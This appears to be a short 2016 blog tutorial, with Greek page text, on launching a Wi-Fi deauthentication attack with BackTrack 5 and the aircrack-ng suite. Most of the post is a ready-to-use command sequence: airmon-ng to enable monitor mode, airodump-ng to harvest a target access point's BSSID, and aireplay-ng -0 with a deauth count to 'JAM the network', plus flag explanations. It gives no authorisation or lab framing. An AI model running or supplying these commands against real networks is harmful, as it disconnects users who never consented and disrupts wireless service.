Τρίτη 31 Μαΐου 2016

De-Authenticaton Attack [TUTORIAL]

Launching the Deauth Attack

In order to launch the attack, I used the following:

1. External network card
2. BackTrack 5

BackTrack is installed in a VMware machine with a USB wireless card (Atheros-based), and it successfully recognised the wireless card. I then followed the steps given below to launch the attack.

Step 1. To know the name of the Interface use this Command.

Code:
airmon-ng

Step 2. The next command sets your wireless card on monitor mode.

Code:
airmon-ng start wlan0

Step 3. Now type this command to search for all networks and copy (BSSID or MAC address of the Network Card)

Code:
airodump-ng mon0

Step4. Now type this command to JAM the network

Code:
aireplay-ng -0 1000 -a (BSSID) mon0

Usage:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0

Where: 

-0 means deauthentication

1000 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

wlan0 is the interface name

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου